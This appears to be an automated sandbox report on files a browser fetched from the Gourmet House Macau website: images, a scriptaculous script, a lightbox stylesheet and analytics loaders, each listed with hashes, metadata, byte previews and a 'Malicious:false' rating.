                                                                                                                                                              SSDEEP:3072:1+eo+e1HTmyrDN7MgDCKDYGJwJUM+BPTc2e6yM9eYYHi1GRvO3EJZR:c8qyKDNJCKDFqJUtBbc2e6l9eYYHxWEt
                                                                                                                                                              MD5:BFF194D37A8722EBF4BC3E9655C70143
                                                                                                                                                              SHA1:ACC83B792BE91325CE9D06192C414A9D24E65A1A
                                                                                                                                                              SHA-256:B18A99B0E52752A6D83603E0765E5462B1B3DFCA79F7051327479AF4593E6988
                                                                                                                                                              SHA-512:E9C1210C595D2F208C29A3A8DAB3A103E25A4AA59655708FEEE8B88B0ED1FBFAAAFAC7E18FF2CD1364CE2ED07F24D6EE67E72792BF1F399288B5591FBF846393
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/uploadfiles/SRL_2_1_3750997.jpg
                                                                                                                                                              Preview:....'aExif..II*...............................................................................................................................(...........1...........2...........i...........8.........Canon.Canon EOS 5D Mark II...$..'....$..'..Adobe Photoshop CS6 (Windows).2020:06:22 10:08:19.............................."...........'.......d...........0221....................................................................................................................30..........30..........30..................................N.......................................................................................1...........2...........4.......$.......................2013:11:08 13:06:34.2013:11:08 13:06:34.................................d.........U......!9.....930611067.d.......d.......................EF100mm f/2.8 Macro.......................................(................................#......H.......H............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IE
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 28x28, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):340
                                                                                                                                                              Entropy (8bit):4.3879072613940515
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:3llVuiPjlXJYhg5suRd8jOdmMN1LwgBKio7gG6n:V/XPYhiPRd8jDcQio7gh
                                                                                                                                                              MD5:4466E4CB28131A895ED4DD7440220BCD
                                                                                                                                                              SHA1:B0A0A001A298AE19022C1F014D51F849D35C819D
                                                                                                                                                              SHA-256:3817C6428A088F690F97417F1A45B7F46BE425EE8223DC8AB281083890306140
                                                                                                                                                              SHA-512:5EC689A15359AFA068BBACD02508CB10417E8D4F8CBAA5EEA8375AE77EF68D118596CC9E2C481E852AA91BFB820F44B622725A69F7F7DF44030D4418738DD7C1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................................T.............................................................."...............................?....X...jj)D. Q...P...=*..@h...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 40x28, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1061
                                                                                                                                                              Entropy (8bit):7.236612630788841
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:dkiPojXbCAUbwjAAoMey6aCWUmABp55H+MLjyrDMjj4np:Ki8L1UboqkABpDhvy8u
                                                                                                                                                              MD5:602D9DCD2A1FBF892CDA6EF232164641
                                                                                                                                                              SHA1:4E73A4885FDF3EE8D8BECC95E5F4A63584DF59E0
                                                                                                                                                              SHA-256:3CB6D28B0D56198B2260F949B31D837BE154FADDC22EE47FFDDDE521E2FB6F92
                                                                                                                                                              SHA-512:C93A25D05BD8289A025EFBFA79205DC7CAA2580D08E2EDFA97FFFE0CF8C9A6A6F762371C94A7A62A7FC996E58171D98398D2B7A0FDB2248DEFCBA69EB581B280
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................(........................................................................................"..!..1AB#a.2......................!1...Qa".A.....2Bb#3..............?..w..5...)M.R...7.J.l..x......`..t........2..zc.Y.5...o]..w_.(..|.}..@.z.3.G..iW.....L.P*.+k.V.q..:...{.y.%.%-..Y'.........roj*...HRK,.b....d....{W....pSwm.U..8.j...De....`....Z.R2..ZR=0....6.|K{.X..-%....d.,H.....*..8..R?.8K.W\..'.qerj..].Z..!...!..;....Kx..?]I./..n....%a|ui`..#....&.m.Br...q.....".......n+.a..`...D......C..'h......\xf..Q.l($jU.?.g.....)..b~'1.gX......uRdw Sw.6>...Xq...nP.Q8.k...r.[c.a..'.}j.b@.*.<..>B...&.H....d."4.....gY[$..C.#.:...k.....^5J.+FR.......I=k.W3.Ut.V.x.....m.-..C.6....6.....}5f...75<.....R.... F....g....r.NE.%C..X..Y..S...`......|.A..!..&.....2.bs.Mm3.*Q..k./..|H..X..].[.s
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=28, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=105], baseline, precision 8, 105x28, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):20342
                                                                                                                                                              Entropy (8bit):6.88156007253464
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:OYNMtKwZRsR+p28y4lH7pYNMtKwZRsR+9HknnPdrCXwIKgCDS9mUNc:OYNg7sRPiFYNg7sSEnnPdrCXgiNc
                                                                                                                                                              MD5:F761ADCB0EFFD78D6CD1D7644FEF45CC
                                                                                                                                                              SHA1:887C343F28FF71F2889080C44FB9889EE3881849
                                                                                                                                                              SHA-256:FB3E7C75C1229B2B9A3381E1F8B51C8A2CE4837D68D199491399BF6034C24129
                                                                                                                                                              SHA-512:982699224D31C3039DBA290A29A8490DE8BBB1091C21D92E681BF6A8B5A7C0283B2E45A7420F1506F847035022ABFFD6CC0400EE0FE7402B53699583A48F9D57
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/menu05b.jpg
                                                                                                                                                              Preview:......Exif..MM.*...............i.......................................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2020:05:26 16:36:05.............0221.......................i...........................................n...........v.(.....................~...........J.......H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 62x28, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):1252
                                                                                                                                                              Entropy (8bit):7.395562897163105
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:dkiPojlXyeb4HBYvzktU6oN4iIFZNGOrMrrJ/XOUjPK49EzdaN/OVV:Ki8ckiB8ktpoNqFHFrM1/jCPzEOj
                                                                                                                                                              MD5:75184F5BB7E07202C027D6C5664CB661
                                                                                                                                                              SHA1:982F70F522E137E8318BD65B68ACE5D46641A6D5
                                                                                                                                                              SHA-256:915C4153466671BA3A8297055169059DF847D3FD75B90867D3892F495596F0C9
                                                                                                                                                              SHA-512:C7EAC3BFEFF2A9F110A94FEF39899077DC449F42CF0CEDAE73A2309616C82D491B5FC0BDD102BE49BCA01DB6C193AB7ED917086748B3582D19E92AADEA4D5846
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/menu02.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................>.........................................................................................!"1.AQ2..a.BS.......................1.!A.Qaq.".......2R..#............?.........h.7.i~.. 787..J...."....m..V.Y.Q...D.'=.9..D]...b..d....{.-...R.....b.%.cg.yKz.w..MvZ..<...GL..Qb...g...Z...G....^..........wi..*.d.9.^ ......w.t....g.0.(..\<Tl.I....K.9....:..ud.....~..<S*p.`@C.!....%E............^'..\.4T...Rb....J.T'.N..$~{~.+@.x|.]...@.4..mW.z.T...Z.:.XG.)e.W..x..Vi.%....I....u ......l..A= .nZw.Y;-..X,.\..6!.cJn ..s...dux...}..V^."o...,H`..C....[...%.......Sd...l~.m..k.....T.=..6Z...4...*...=./.......6..f.V...........s,.g#.L|w...x..K..DA..Y.....bI>O.u.$.r.fL..[/.....irP..)..~+.....C........UA.o.o..W.d.....]..B...Xg.Xl.....l.W...3.tg..rG.......j=.c.Pw....].5.].Ew'.9%.c0
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:GIF image data, version 89a, 66 x 22
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):979
                                                                                                                                                              Entropy (8bit):7.152303281541647
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:XqWq4WQwtW4mGj20TvusVorrgQw2I+jP1bEvNZLKZ:a32BzofCsifgr2p5
                                                                                                                                                              MD5:0E5462B0B4F00432EAC4B33D5FA31C5A
                                                                                                                                                              SHA1:A7AB83BE74A01E3FAEAD864FCE268F03C4D8CAF2
                                                                                                                                                              SHA-256:CC3C8F67291B46B0B7C26148F146DB5C486D049C5A4996643BCDBFB005917082
                                                                                                                                                              SHA-512:52CAB6BFA1BDC3E106698E9E7A57524D0E25BCAA085C84B3C1D14097950AEA3C82DE0CD6DE48C74AB5100B41414EBD8D2ADB373ABB02CB395791C64D661F125F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/closelabel.gif
                                                                                                                                                              Preview:GIF89aB...............YYY..............PPP.........TTTVVV...RRR...QQQXXXUUU...SSS...............WWW...LLLOOOfff.........```{{{............lll...............xxx...KKK...___...........pppccc..........nnn...ooo........eeevvv...mmm|||.............yyyZZZdddMMMsssggg.........NNNiii...zzz............................................................................................................!.......,....B.......\...............]........\'.......\,GB\.\#.......]!@.Q".]..4.U...Z..]...ZZ...M2..EZ..$...>...[...].[....[....../\....[...T6.F.0....]"lY.AK.....d`...Z.0..Q.........d.|.J$..@.....H...U...&.xN..-.*..8...z....P...$.&$.!...-.,....U.]**.ytKRC...H.a..... ..)i.%...Z....-...m!....FQ..0`B...&.E71.K|......H..O.$.c..tM"..neI..Qb.U2.g...1%...qM`pu..Nc9'[.l...I@q+..B..iY@8....pI..:,.`3G..U..q#..7l9Y...D.Q.q=..+/8.....M<.cOV.@m..s.H.xf.. @.E.%d H..N A.'Pr.s..x.29E...:.._.......p ......3\8....l.Q+X.@0."...(.....OT...L...O."...Tu..Kp..+.4.~g..f....;
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 62x28, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1520
                                                                                                                                                              Entropy (8bit):7.537015242837859
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:dkiPojlpMlWNLgLcQnwMowinY4dO2K3iR+WXPmDRS9SZiXns9y84dM7q:Ki83MycLvvSpdO5yTXeo9S0Xnw4K7q
                                                                                                                                                              MD5:DE2128897CC09094065BD906AC8763E8
                                                                                                                                                              SHA1:25B1C5F728357752D864810461394706C47963E1
                                                                                                                                                              SHA-256:809F81E827C5BF143E13C2BF01C68433ACEE3D5680A74A9E5E2726E35CDB1478
                                                                                                                                                              SHA-512:C1F40EA0A3E124F3BB43A38A87BD4F4B34C3C6480A86BB3C62BF4FC0022E3E62BFC581CFC92AF916878453741C22BD15F74CA7CC08746AF4B412C21D59A3A97E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................>..........................................................................................!1"...2AaqR#S........................!1..AQ..q."2.a......r.$..............?.....f..g.L0....uN.....J.e.m.R..s...E.k.t.La9..1.0...T...)M.R...7.Jo..G.!"..W.5U..;..]}...8.f.r)[(..k^_x..aG-...^.....cl.....E= .H.A>.'.>.[.D.<|2..5.\{.........l..Z..-o5....^i...)C.9.:..i....o.kr...D)..R3!..9....*......O......j..(5..8.Y...>.U!..........H.-.d.lz...dWUP.+.k.b..\0\[.CZ.$..j>E..j.nUs.l....O.m..V..C.Z%$#...6......v+6,...(..1..!..G..{@.|>....}..1f.....(y....)QT.`.#...9......s.o..=.]]........t...87."..\"..8O....YK...,!A.Q^..R......$......\....i.n....v}.G.x.i^..2d.c.z...[G.,..;...5n....c...|.~.'.......c_..%..e"KK.....g.i...Sp..q.n,9.j.B...h....XbGS..H.1..a..... .Rm..\.~_J.+.;tV5c+.n
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 100x28, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2264
                                                                                                                                                              Entropy (8bit):7.7212562551861135
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:Ki8mrYdcsSa2ArT1btLFjMj+p0shLYC9k0tQcrX0MJ9aHM5OaCG3kvn/nson:+mrYd2aZRFTHcoBoMJ975Oaz0P/son
                                                                                                                                                              MD5:8FBCA91A2539EE378A5D1E2C21C413FC
                                                                                                                                                              SHA1:0A21083E64D8C9709F84F4D965344CBCE6B4B837
                                                                                                                                                              SHA-256:CB731B4D238B1EC7F708E3BD32787468C7767A3B88D23DB8C25DAC32C1D6BF27
                                                                                                                                                              SHA-512:97452D476732265CC30AC0D7F74D9E6420096F5663E2ABA6037CD866AC7BF5D59A7FDC147C21E902D9A0207BB165A7172F07875FD5B7A91A4EEC2EB692253AFA
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................d..........................................................................................!".1A...Bba2#3$4........................!.1A.Qaq"2..BR.....3............?....f..o.o.o.o... .c....a......+Q.#Q.k..E.T..0."....u........im....R..R...d..sb...!.C8.78Ej8dj9..sV......&..@u ...4:..y..#.-.Y.Q.JQ.JWP.d..gYE......l.......qT.....+...{**...S...q..PQCsEi...1..r.F=...J..@_...+..R$.%e......q..'3....Rq....u7S]M.....}.%.on......1..<.......]....a.....p."S.p.bcfh..jE.=.{QF.......F,.Q...q..K......\`.{......]..... .$K.Q..p..R4b..i..U._...R......K.f.L.#.[.....7.%......i-...8.......Gb.J."..*._..U./D.w...>.v.\,W...>R.F.x1n7.Oa.s1V*8V.&.c...H.2.__.....+h.px.GocW...-;..}.Ce..Cx.6.....m.2.....5wUc....~....b.....#.A......c.`.Dq.2..#Q.G...z'Mx...j.p.\....\..K..[i,>.p..
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=14, height=3744, bps=182, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 5D Mark II, orientation=upper-left, width=5616], baseline, precision 8, 500x334, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):153460
                                                                                                                                                              Entropy (8bit):7.871276196790748
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3072:1+eo+e1HTmyrDN7MgDCKDYGJwJUM+BPTc2e6yM9eYYHi1GRvO3EJZR:c8qyKDNJCKDFqJUtBbc2e6l9eYYHxWEt
                                                                                                                                                              MD5:BFF194D37A8722EBF4BC3E9655C70143
                                                                                                                                                              SHA1:ACC83B792BE91325CE9D06192C414A9D24E65A1A
                                                                                                                                                              SHA-256:B18A99B0E52752A6D83603E0765E5462B1B3DFCA79F7051327479AF4593E6988
                                                                                                                                                              SHA-512:E9C1210C595D2F208C29A3A8DAB3A103E25A4AA59655708FEEE8B88B0ED1FBFAAAFAC7E18FF2CD1364CE2ED07F24D6EE67E72792BF1F399288B5591FBF846393
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:....'aExif..II*...............................................................................................................................(...........1...........2...........i...........8.........Canon.Canon EOS 5D Mark II...$..'....$..'..Adobe Photoshop CS6 (Windows).2020:06:22 10:08:19.............................."...........'.......d...........0221....................................................................................................................30..........30..........30..................................N.......................................................................................1...........2...........4.......$.......................2013:11:08 13:06:34.2013:11:08 13:06:34.................................d.........U......!9.....930611067.d.......d.......................EF100mm f/2.8 Macro.......................................(................................#......H.......H............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IE
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):43
                                                                                                                                                              Entropy (8bit):3.0950611313667666
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                                                                                                              MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                                                                                                              SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                                                                                                              SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                                                                                                              SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:https://hm.baidu.com/hm.gif?cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=913&et=0&ja=0&ln=en-us&lo=0&lt=1678710370&rnd=444628624&si=3eff88a357a8c5aca6bb583a65de2875&v=1.3.0&lv=2&sn=31365&r=0&ww=1280&u=http%3A%2F%2Fwww.gourmethousemacau.com%2FIndex.asp&tt=Gourmet%20House%20Macau%20Ltd
                                                                                                                                                              Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 970x43, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):894
                                                                                                                                                              Entropy (8bit):2.2993635994559245
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:3llVuiPjlXJYhg5suRd8T0WkmMtklelcmdWmsycyP5Qe:V/XPYhiPRd8nUoUcyCe
                                                                                                                                                              MD5:127FEDF0638CE62C681C002CABEA5C5F
                                                                                                                                                              SHA1:6DEF550829CD0E608A67A88B927DD207D92E5E16
                                                                                                                                                              SHA-256:2EA18201CAC1CC9B163B55308470A72942CC858E1D63A9F1C0908EEDAC40528A
                                                                                                                                                              SHA-512:E21DD0FC1AFCFD7914EDEFE49AF7BA3AEE54C2302C0062282D8C9DC466FC7FE1E1D7E450DBAC4DA1861DEEA1422293A8071D6C82B71E19E0DDA9EED4CBAB497A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/copyrightbg.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................+...............X..............................................................1AQ!................................?..Nob..'JG\...........................................................................................Lyo.u.........]...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):31969
                                                                                                                                                              Entropy (8bit):4.846685498574798
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:iSJFgzLHcnk8EDGE39sOmuMpc+kByVwuEQC+3AEvAgpvlu7c3+hX8hX:iSWYpEDGAmRS+kByVwLnEvA6
                                                                                                                                                              MD5:82E25A810F86D3B8CA0CA42EF56A8956
                                                                                                                                                              SHA1:21CE51DAA693E3716678AC4190369B499B35E8DE
                                                                                                                                                              SHA-256:7BEF7D80DE9BE54ADCD132D9B10CD3EFC98AB8740FDC23F0E0215160BCF4AA72
                                                                                                                                                              SHA-512:1F26060F0F909ABA7F63CF0E4EE85390E8583F8E74FF6FC2B87725BAA265E63956747ACEF846AE64DF093870BA2F20AC6A5856DE6DA0A1A0599A3685F7B851E3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/js/effects.js
                                                                                                                                                              Preview:// Copyright (c) 2005 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us).// Contributors:.// Justin Palmer (http://encytemedia.com/).// Mark Pilgrim (http://diveintomark.org/).// Martin Bialasinki.// .// See scriptaculous.js for full license. ../* ------------- element ext -------------- */ . .// converts rgb() and #xxx to #xxxxxx format, .// returns self (or first argument) if not convertable .String.prototype.parseColor = function() { . var color = '#'; . if(this.slice(0,4) == 'rgb(') { . var cols = this.slice(4,this.length-1).split(','); . var i=0; do { color += parseInt(cols[i]).toColorPart() } while (++i<3); . } else { . if(this.slice(0,1) == '#') { . if(this.length==4) for(var i=1;i<4;i++) color += (this.charAt(i) + this.charAt(i)).toLowerCase(); . if(this.length==7) color = this.toLowerCase(); . } . } . return(color.length==7 ? color : (arguments[0] || this)); .}..Element.collectTextNodes = function(element) { . return $A($
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=350, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=160], baseline, precision 8, 160x350, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):97469
                                                                                                                                                              Entropy (8bit):7.875204428572194
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:CArTSArT3E5ZeWJW+ro2D0/kKobA3ZI9VTwtkJHrGZuTXzSqjZSVKhXR8g:CArOAr+e+IVszA3ZI9V2wrGZuTnZxlRb
                                                                                                                                                              MD5:8FD0B31FBDA24A1AC68FDDA8B6DF89F1
                                                                                                                                                              SHA1:8786A2FC8A46377DBBFF0D76036527F83CB60348
                                                                                                                                                              SHA-256:FF34FB1F66E26D0D3C847056D7A71CDEC8C0E401B73C636C1B82A94EA3EBA8B2
                                                                                                                                                              SHA-512:02AB6477AB127398D13C2366CE54E6ABC1D4CCA7B2B92F1517B2F210B238DE3BCE25B292E462C2CCE13871125F6719C3664E0BFC0AC6F5DCD4D3410BBBC08B8C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/indexpic03.jpg
                                                                                                                                                              Preview:.... .Exif..MM.*...........................^...........................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2020:05:28 12:02:39.............0221...................................^...............................n...........v.(.....................~...................H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):2030
                                                                                                                                                              Entropy (8bit):5.153371354478931
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:UKr8IBJf540WhXgrh9WrS2XYhCH+jEKO2Zr77N2wLrSGgBse8hy:UKzBJf540WhQXW9XrqEKbrfgBslM
                                                                                                                                                              MD5:43F1AA211CC42F2B0DE73529DB001C5C
                                                                                                                                                              SHA1:338EDA0D9BD91B5D0281BF9196E79840405B7332
                                                                                                                                                              SHA-256:4E8957DF0C77609257BE1BA334ED582008C6793D7B537B57FB6DDB57BA9BA42D
                                                                                                                                                              SHA-512:C03CD3C6F99C968A27275241A6547F88F3CC4EEB272E4CCE9F62EF42B4852F32D810BBA24A5C842553E0CD110D6EA1AF6F7E734D13E833C290E7F790B2668770
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/css/lightbox.css
                                                                                                                                                              Preview:#lightbox{...position: absolute;...left: 0;...width: 100%;...z-index: 100;...text-align: center;...line-height: 0;...}....#lightbox a img{ border: none; }....#outerImageContainer{...position: relative;...background-color: #fff;...width: 250px;...height: 250px;...margin: 0 auto;...}....#imageContainer{...padding: 10px;...}....#loading{...position: absolute;...top: 40%;...left: 0%;...height: 25%;...width: 100%;...text-align: center;...line-height: 0;...}..#hoverNav{...position: absolute;...top: 0;...left: 0;...height: 100%;...width: 100%;...z-index: 10;...}..#imageContainer>#hoverNav{ left: 0;}..#hoverNav a{ outline: none;}....#prevLink, #nextLink{...width: 49%;...height: 100%;...background: transparent url(../images/blank.gif) no-repeat; /* Trick IE into showing hover */...display: block;...}..#prevLink { left: 0; float: left;}..#nextLink { right: 0; float: right;}..#prevLink:hover, #prevLink:visited:hover { background: url(../images/prevlabel.gif) left 15% no-repeat; }..#nextLink:hover
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):106
                                                                                                                                                              Entropy (8bit):4.853934992757204
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:yLRmcpZBbQxYkNX/rFO0Wty0eEHPWHLGXImMn:yL/pZ9gYkNvh/oHP0VmMn
                                                                                                                                                              MD5:FDFFADA99A6E326385C9D6D22006B6C8
                                                                                                                                                              SHA1:F69101FDEEB5282659EBFFA17EC82E89A0CD09F9
                                                                                                                                                              SHA-256:C58C444AF409B74761D5CB4A86FDE4B48EE2D4701252B439834F01868C8CB955
                                                                                                                                                              SHA-512:A7190172EBB6023D27A69629801B9B71CBA77F7F4889AECB129EA8B8E84FEF7BD1CC21CA3EE2FE327BD4D97F30BEE5ED40927F2A54D45A13C66EDCA653A60F3D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:https://jspassport.ssl.qhimg.com/11.0.1.js?d182b3f28525f2db83acfaaf6e696dba
                                                                                                                                                              Preview:document.write('<script charset="utf-8" src="https://s.ssl.qhres2.com/ssl/ab77b6ea7f3fbf79.js"></script>')
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=14, height=3744, bps=182, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 5D Mark II, orientation=upper-left, width=5616], baseline, precision 8, 500x334, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):225579
                                                                                                                                                              Entropy (8bit):7.931611481231521
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:IlJzlJJ8IQmWOjZmWznn6d5EJM6x855Er1cekxqA3YZxxrS:wJhJisbpzn6TEG+ry+A3YZx1S
                                                                                                                                                              MD5:60026B83B46CA887EE0B005B850999A7
                                                                                                                                                              SHA1:0D8B0B0E320598FC2E9A520DBEB6EEAAEEE82956
                                                                                                                                                              SHA-256:B2ED760A31E9055D5C75E75E8D58EA3052155842B0B4B6A9F23438A7CFD5C10A
                                                                                                                                                              SHA-512:7CD60DCCCBE974F206160DB9EF6F919585FB2946C0835E1034D0B2052B8D7A324B1DD8E196F3382CACC10AD93D4B05DB6AC3AD5CD68AA06DE26D7003483A0F6C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/uploadfiles/SRL_8_1_3753286.jpg
                                                                                                                                                              Preview:....0qExif..II*...............................................................................................................................(...........1...........2...........i...........8.........Canon.Canon EOS 5D Mark II...$..'....$..'..Adobe Photoshop CS6 (Windows).2020:06:22 10:11:06.............................."...........'.......d...........0221....................................................................................................................30..........30..........30..................................N.......................................................................................1...........2...........4.......$.......................2013:11:08 13:06:34.2013:11:08 13:06:34.................................d.........U......!9.....930611067.d.......d.......................EF100mm f/2.8 Macro.......................................(................................,......H.......H............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IE
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 68x20, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):1686
                                                                                                                                                              Entropy (8bit):7.617394597360595
                                                                                                                                                              Encrypted:false
